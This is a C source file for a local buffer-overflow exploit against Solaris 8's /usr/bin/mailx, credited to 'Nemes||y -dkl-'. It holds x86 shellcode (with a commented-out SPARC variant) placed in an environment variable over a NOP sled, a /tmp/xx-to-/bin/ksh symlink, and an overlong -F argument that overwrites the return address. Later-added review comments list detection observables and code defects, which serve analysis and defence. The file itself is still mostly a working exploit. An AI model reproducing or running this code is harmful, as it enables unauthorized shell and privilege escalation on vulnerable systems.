|
/* /usr/bin/mailx overflow I've tested it on Solaris 8 by Nemes||y -dkl- dragon@shellnow.it */
/*
 * Review notes (defender's reading of this file):
 *  - Everything it does is visible below: build a 1149-byte argument of 0x41 ('A') bytes
 *    with a 4-byte address (stack pointer + offset) patched in at index 1116, plant an
 *    environment variable "SOR=" whose value is 0x90 padding plus the payload bytes,
 *    create the symlink /tmp/xx -> /bin/ksh, then execl() /usr/bin/mailx with "-F" and
 *    the oversized argument.
 *  - Observables a detection rule can key on, all taken from this source: a symlink
 *    /tmp/xx pointing at /bin/ksh, an environment variable named SOR whose value is
 *    mostly 0x90 bytes, and mailx started with "-F" followed by an argument of roughly
 *    1150 bytes consisting almost entirely of "A".
 *  - The defect being exercised is in mailx's handling of the -F argument (unbounded
 *    copy of an argv string, as far as this file shows); the fix belongs there, not here.
 */
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
/* NOTE(review): memset/memcpy/strlen are called below without <string.h>; the file
 * relies on implicit function declarations, which C99 removed and current compilers
 * reject outright. */

#define LEN 1150      /* size of buf: the -F argument is LEN-1 bytes plus a NUL */
#define offset 2075   /* added to the caller's stack pointer to form the "Return addr" printed below */

/*-------------------------------------------------------------
 * SPARC variant left by the author, commented out; the live build below is i386
 * (inferred from the AT&T-syntax "movl %esp, %eax" in stackpointer()).
char shellcode[] =
"\xa0\x23\xa0\x10\xee\x23\xbf\xec\x82\x05\xe0\xd6\x90\x25\xe0\x0e\x92\x25\xe0\x0e\x94\x1c\x40\x11"
"\x96\x1c\x40\x11\x98\x25\xe0\x0f\x91\xd0\x38\x08\xa4\x1a\x80\x08\xd2\x33\xbf\xf0\xac\x10\x27\xd1"
"\xec\x33\xbf\xf2\xc0\x23\xbf\xf4\x82\x05\xe0\xd8\x90\x1a\xc0\x12\x92\x1a\xc0\x10\x94\x1a\xc0\x17"
"\x91\xd0\x38\x08\x82\x05\xe0\xd9\x90\x1a\xc0\x12\x92\x25\xe0\x0b\x91\xd0\x38\x08\x82\x05\xe0\xda"
"\x90\x1a\xc0\x12\x92\x1a\xc0\x10\x94\x23\xa0\x14\x91\xd0\x38\x08\xa6\x1a\xc0\x08\x82\x05\xe0\x2e"
"\x90\x1a\xc0\x13\x92\x25\xe0\x07\x94\x1b\x80\x0e\x91\xd0\x38\x08\x90\x1a\xc0\x13\x92\x25\xe0\x07"
"\x94\x02\xe0\x01\x91\xd0\x38\x08\x90\x1a\xc0\x13\x92\x25\xe0\x07\x94\x02\xe0\x02\x91\xd0\x38\x08"
"\x90\x1b\x80\x0e\x82\x02\xe0\x17\x91\xd0\x38\x08\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xdc\xda"
"\x90\x23\xa0\x10\x92\x23\xa0\x08\x94\x1b\x80\x0e\xe0\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x02\xe0\x3b\x91\xd0\x38\x08\x90\x1b\x80\x0e\x82\x02\xe0\x01\x91\xd0\x38\x08";
to get stackpointer...
{ __asm__("mov %sp,%i0 \n");}
 ---------------------------------------------------------------*/

/*-------------------------------------------------------------*/
/* Payload placed in the environment by main(). Its last seven bytes,
 * 2f 74 6d 70 2f 78 78, are the ASCII string "/tmp/xx" -- the path main() links to
 * /bin/ksh -- so the payload and the symlink below depend on each other. The leading
 * eb 1c 5e are x86 "jmp short / pop %esi" encodings (from the byte values, not stated by
 * the author). Opaque machine code otherwise; any edit changes behavior. */
char shellcode[]=
"\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06"
"\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90"
"\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0"
"\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33"
"\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec"
"\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89"
"\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50"
"\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2"
"\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4"
"\x04\xe8\xc9\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78";

/* Intended to return the caller's stack pointer.
 * There is no return statement: the inline asm copies %esp into %eax and the author
 * relies on %eax being the i386 return register and on the compiler leaving it alone
 * until the epilogue. Per the C standard the value the caller reads is undefined; a
 * different compiler or optimization level can legitimately yield garbage here. */
unsigned long stackpointer(void) { __asm__("movl %esp, %eax"); }

/*-------------------------------------------------------------*/
/* Entry point. Order matters: the environment variable must be in place before
 * execl(), and the symlink must exist before the payload names it. No return value is
 * checked anywhere (malloc, symlink, execl); if execl() fails, main falls off its end. */
int main()
{
    long esp = stackpointer();          /* signed long receiving an unsigned long; see stackpointer() */
    unsigned char buf[LEN];             /* the overlong -F argument */
    char *envi;                         /* "SOR=..." string handed to putenv() */
    unsigned long magic = esp + offset; /* value written into buf at index 1116 */

    printf("\nSolaris Mailx Exploit - coded by Nemes||y -dkl-\n\n");
    /* %x with long / unsigned long arguments is a format/type mismatch (undefined per
     * the standard); it only prints sensibly on an ILP32 target such as Solaris/x86 8. */
    printf(":: Stack Pointer -> 0x%x\n", esp);
    printf(":: Offset -> 0x%x\n", offset);
    printf(":: Return addr -> 0x%x\n\n", magic);

    /* 300-byte environment value: 0x90 filler, payload ending at index 279, "SOR=" name
     * over the first four bytes, NUL at 299. malloc() result is not checked. putenv()
     * keeps the pointer itself rather than copying, so envi is deliberately never freed. */
    envi = (char *)malloc(300*sizeof(char));
    memset(envi,0x90,300);
    memcpy(envi+280-strlen(shellcode),shellcode,strlen(shellcode));
    memcpy(envi,"SOR=",4);
    envi[299]=0;
    putenv(envi);

    /* /tmp/xx is the path embedded at the end of shellcode[]; a pre-existing /tmp/xx
     * makes this fail silently (return value ignored). */
    symlink("/bin/ksh","/tmp/xx");

    /* 1149 bytes of 'A' with magic at 1116..1119; copies exactly 4 bytes of an
     * unsigned long, i.e. only the low half on an LP64 build. */
    memset(buf,0x41,1150);
    memcpy(buf+1116,&magic,4);
    buf[1149]=0;

    /* Replaces this process with mailx; the oversized buf is the value of -F.
     * NULL should be (char *)NULL as a variadic terminator for portability. */
    execl("/usr/bin/mailx","mailx","-F",buf,NULL);
}
/* EoF */